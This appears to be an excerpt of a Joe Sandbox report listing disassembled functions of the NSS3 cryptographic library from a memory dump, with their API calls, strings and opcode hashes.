Function 6C798F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C79905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7990EC

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799111

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 9b3f4165ac404acdeaebde3b18a639ad97565ea33329adf2efc9118802add079
Instruction ID: a0071b91769593d7f384c70c3dc261745d0621799e88d77ec053b4499a0570e2
Opcode Fuzzy Hash: 9b3f4165ac404acdeaebde3b18a639ad97565ea33329adf2efc9118802add079
Instruction Fuzzy Hash: 79518974A046158FDF10EF38D688299BBF1BF4A318F055579DC499BB06EB35E884CB81

Function 6C786730 Relevance: 13.6, APIs: 9, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 6C785DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C785DEC
Part of subcall function 6C785DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C785E0F

_SGN_VerifyPKCS1DigestInfo.NSS3(00000000,?,?,00000000,?,?,?,?,?,?,?,?,6C786729), ref: 6C7867A0

Part of subcall function 6C7CA470: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7CA4A6
Part of subcall function 6C7CA470: PORT_Alloc_Util.NSS3(?), ref: 6C7CA4EC
Part of subcall function 6C7CA470: memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C7CA527
Part of subcall function 6C7CA470: memcmp.VCRUNTIME140(00000006,?,?), ref: 6C7CA56D
Part of subcall function 6C7CA470: memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C7CA583
Part of subcall function 6C7CA470: PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7CA596
Part of subcall function 6C7CA470: free.MOZGLUE(?), ref: 6C7CA5A4

SECKEY_SignatureLen.NSS3(?,?,?,?,?,?,?,?,?,6C786729), ref: 6C7867C0
PR_SetError.NSS3(FFFFE030,00000000,?,?,?,?,?,?,?,?,?,6C786729), ref: 6C786800
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C786842
free.MOZGLUE(?), ref: 6C786855
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78686B
free.MOZGLUE(00000000), ref: 6C786874
PK11_VerifyWithMechanism.NSS3(?,-00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C786729), ref: 6C7868C1
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7868D6

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Utilfree$Verifymemcmp$AlgorithmAlloc_DestroyDigestFindInfoItem_K11_MechanismPolicyPublicSignatureTag_WithZfreememcpy
String ID:
API String ID: 1437015310-0
Opcode ID: 53e89101c10e53e16ecc37af95acad0935e29710ed8cba768af076380dbce5a9
Instruction ID: bf86c195e1fc5409bdbc4dec8e5d0bdc74dc78d38b45289f6ee4bade0ac33b61
Opcode Fuzzy Hash: 53e89101c10e53e16ecc37af95acad0935e29710ed8cba768af076380dbce5a9
Instruction Fuzzy Hash: BA51E5B0A012016BEB10CF69CD85B9B73F5EF85308F544438E95EDB741EA31EA05C7A1

Function 6C7C0750 Relevance: 13.6, APIs: 9, Instructions: 118COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C07AA
EnterCriticalSection.KERNEL32(?,?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C07C7
PR_Unlock.NSS3(?,?,?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C07E5
PK11_GetNextSafe.NSS3 ref: 6C7C0801
PR_Unlock.NSS3(?,?,?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C0817
TlsGetValue.KERNEL32(?,?,?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C0835
EnterCriticalSection.KERNEL32(?,?,?,?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C084E
PR_Unlock.NSS3(?,?,?,?,?,74720406,6C787296,00000000,?,6C7C44FE,?,?,?,?,6C787296,00000000), ref: 6C7C0870
free.MOZGLUE(?,?,?,?,?,74720406), ref: 6C7C088F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$K11_NextSafefree
String ID:
API String ID: 810312292-0
Opcode ID: ef2568bae07adae176cd60f2e6348927dae100a1d2ce858da93704beebf6af04
Instruction ID: 82f97d8f8ad32d11d0388ab363c95bf424347910d8305cdcb251c81b03215b77
Opcode Fuzzy Hash: ef2568bae07adae176cd60f2e6348927dae100a1d2ce858da93704beebf6af04
Instruction Fuzzy Hash: A6411CB4A04646CFCB10EF79C68856DBBF0BF05348F118929D89997B11EB30E994CBD2

Function 6C78E400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C793F23,?), ref: 6C78E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C78E44F

Part of subcall function 6C792C40: TlsGetValue.KERNEL32(#?yl,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C62
Part of subcall function 6C792C40: EnterCriticalSection.KERNEL32(0000001C,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C76
Part of subcall function 6C792C40: PL_HashTableLookup.NSS3(00000000,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C86
Part of subcall function 6C792C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C793F23,?), ref: 6C78E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C78E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C78E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C78E52F

Strings

#?yl, xrefs: 6C78E409

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID: #?yl
API String ID: 3106257965-101552813
Opcode ID: 7d7c8a240e7c4d359135bdfad8d800b6f3a74fb67f6ca1f0be6449b45e55d6fe
Instruction ID: 3236ccec95d6cacd0ac5b819eafb621b53b54ac414554606c7860373e4d1d3a7
Opcode Fuzzy Hash: 7d7c8a240e7c4d359135bdfad8d800b6f3a74fb67f6ca1f0be6449b45e55d6fe
Instruction Fuzzy Hash: 80411DB8A056158FCB10EF78D68855ABBF0FF05308F054979E9999BB11E730E894CBD2

Function 6C788CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C79124D,00000001), ref: 6C788D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C79124D,00000001), ref: 6C788D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788D73
PR_Unlock.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788D8C

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788DBA

Strings

KRAM, xrefs: 6C788CF9
KRAM, xrefs: 6C788D3E

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 4c4c65a12a014b0ee354923983b23d46c4bc6f4cfcde25ad69dae1db1eca1482
Instruction ID: 51350dacd2271357fa5deb661e0f4462f43acd3052176adaa4bd8fa00e4adba7
Opcode Fuzzy Hash: 4c4c65a12a014b0ee354923983b23d46c4bc6f4cfcde25ad69dae1db1eca1482
Instruction Fuzzy Hash: 8F21A1B5A056018FCB10EF39C68565AB7F0FF59318F15897ADA88CBB01D730E841CBA1

Function 6C7AACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C7AACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAD23

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C7AAD1C
hSession = 0x%x, xrefs: 6C7AACFE, 6C7AAD0E
C_MessageDecryptFinal, xrefs: 6C7AACE1

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: a4d325ad8044793334164e9ee2fe2b33f22a3c4fd2fc4a8b9b603e1ff0567fab
Instruction ID: f3cc91426caa97d8c8f9b51e64ff0b730f02f9ae6590a7cb2cf7df0bc7125c20
Opcode Fuzzy Hash: a4d325ad8044793334164e9ee2fe2b33f22a3c4fd2fc4a8b9b603e1ff0567fab
Instruction Fuzzy Hash: 9A210D71601154AFDB309B98DF8DB6A7375AB4232DF044539E80A97B12DB34BC0ACBD2

Function 6C7AA550 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6C7AA576
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AA5A4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AA5B3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AA5C9

Strings

(CK_INVALID_HANDLE), xrefs: 6C7AA5AC
hSession = 0x%x, xrefs: 6C7AA58E, 6C7AA59E
C_MessageEncryptFinal, xrefs: 6C7AA571

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal
API String ID: 332880674-1768899908
Opcode ID: 849973923c487621b3e18ec5d6f0baec2dd3ab9ea9b0cb29d93bce6d8ce8a04b
Instruction ID: 0f057dedbd53b4c776171e06a561134ccf4ef6de980487bba9aeb14234ca9ad7
Opcode Fuzzy Hash: 849973923c487621b3e18ec5d6f0baec2dd3ab9ea9b0cb29d93bce6d8ce8a04b
Instruction Fuzzy Hash: B021D871602114AFDB209B989F8CB6A3375AB4632CF044535E80997B11DB34BD4ACFD2

Function 6C880ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C880EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C880EFA

Part of subcall function 6C76AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C76AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F2B

Strings

Aborting, xrefs: 6C880EB3
Assertion failure: %s, at %s:%d, xrefs: 6C880ED9, 6C880EE5, 6C880F06, 6C880F0B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 3b5efcb8b58fd8cb847df5acbc3905236a6dec5fa1f809cdbd1bf790cf498bcc
Instruction ID: d404a3d5549d2bd11ac4f9b64d8def5ad8c1973ce66d26a33ae11939493f2463
Opcode Fuzzy Hash: 3b5efcb8b58fd8cb847df5acbc3905236a6dec5fa1f809cdbd1bf790cf498bcc
Instruction Fuzzy Hash: FF01ADB6901114ABDF21AF68DD898AB3B3CEF46368B004464FD0997B02D731EA50C6E2

Function 6C8807B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filestringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C761FA7,WinDebug,00000000,00000001,?,6C761FA7,00000000), ref: 6C8807BE
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(6C761FA7,6C8A843A,6C761FA7,00000000), ref: 6C8807E0
setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000004,00000000), ref: 6C8807F6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,6C761FA7,00000000), ref: 6C880812
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C880827
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C88083F

Strings

WinDebug, xrefs: 6C8807B8

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __acrt_iob_func$fclosefopensetvbufstrcmp
String ID: WinDebug
API String ID: 1416283249-2102910228
Opcode ID: d2d3b4c1fc44db98afb6a28c423cbabd3852c66985dcde1aaaed8b2d3a36a2f2
Instruction ID: c71f83e33c522b9c3077ceca1ab43b6688001e6163524cec6be48e8d03209941
Opcode Fuzzy Hash: d2d3b4c1fc44db98afb6a28c423cbabd3852c66985dcde1aaaed8b2d3a36a2f2
Instruction Fuzzy Hash: 22112C71743460ABEF3017689D0566E3668DF4336EF580934F915CAA81EB20ED51C3E2

Function 6C844D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C844DE0

Strings

misuse, xrefs: 6C844DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C844DCB
invalid, xrefs: 6C844DB8
%s at line %d of [%.10s], xrefs: 6C844DDA
API call with %s database connection pointer, xrefs: 6C844DBD

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 366405c5880a391cc33e40904c9a9557b963a0141f5a2221561ec41da87228f6
Instruction ID: 2e5a1d0092559a4bf904b79fbdfe59b4ab1521becc6544a37f294a1f322c7ec1
Opcode Fuzzy Hash: 366405c5880a391cc33e40904c9a9557b963a0141f5a2221561ec41da87228f6
Instruction Fuzzy Hash: 35F02421A04A6C6FD7204455CF15F8633554F8131AF0A4DA0ED047BF52D249A8508380

Function 6C844DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C844E4D

Strings

misuse, xrefs: 6C844E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C844E38
invalid, xrefs: 6C844E25
%s at line %d of [%.10s], xrefs: 6C844E47
API call with %s database connection pointer, xrefs: 6C844E2A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a99b87d89cbc6eef1fe8363a93a5baaf5fc0972c4014f5d0676a6f08e9141de9
Instruction ID: 0d75233fde62582df5dbfbd5692f08ed4bcf8fe69e4d45ac5e392dd7755f49f0
Opcode Fuzzy Hash: a99b87d89cbc6eef1fe8363a93a5baaf5fc0972c4014f5d0676a6f08e9141de9
Instruction Fuzzy Hash: A1F02711E4492C6BE73004659F18FC737864B91339F0DCCA1EE0A77F93D209987152D1

Function 6C7B0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000,?,?), ref: 6C7B0CB3

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C7B0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C7B0DEC

Part of subcall function 6C7D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
Part of subcall function 6C7D0F10: malloc.MOZGLUE(00000001), ref: 6C7D0F30
Part of subcall function 6C7D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000), ref: 6C7B0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0E53
